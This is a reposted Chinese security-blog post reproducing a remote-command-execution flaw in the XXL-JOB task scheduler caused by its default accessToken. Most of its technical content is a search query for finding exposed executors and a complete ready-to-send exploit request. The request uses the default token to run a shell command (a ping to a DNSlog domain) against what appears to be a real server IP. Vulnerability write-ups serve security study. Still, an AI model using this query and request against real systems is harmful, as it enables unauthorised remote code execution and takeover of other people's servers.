声明
该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。
漏洞描述
XXL-JOB 是一款开源的分布式任务调度平台,用于实现大规模任务的调度和执行。XXL-JOB 默认配置下,用于调度通讯的 accessToken 不是随机生成的,而是使用 application.properties 配置文件中的默认值。在实际使用中如果没有修改默认值,攻击者可利用此绕过认证调用 executor,执行任意代码,从而获取服务器权限。经分析和研判,该漏洞利用难度低,可导致远程代码执行。
资产收集
"invalid request, HttpMethod not support" && port="9999"漏洞复现
构造请求包,这里ping命令后填写的是DNSlog的域名。
POST /run HTTP/1.1Host: 101.35.179.162:9999User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36Connection: closeContent-Length: 422Content-Type: application/jsonXXL-JOB-ACCESS-TOKEN: default_tokenAccept-Encoding: gzip{"jobId": 187270,"executorHandler": "demoJobHandler","executorParams": "demoJobHandler","executorBlockStrategy": "COVER_EARLY","executorTimeout": 0,"logId": 187270,"logDateTime": 116989791110,"glueType": "GLUE_SHELL","glueSource": "ping xxxx","glueUpdatetime": 116989791110,"broadcastIndex": 0,"broadcastTotal": 0}
返回包
同样在DNSlog里面也能看见请求
原文始发于微信公众号(Devil安全):【漏洞复现】XL-JOB默认accessToken身份绕过远程命令执行漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论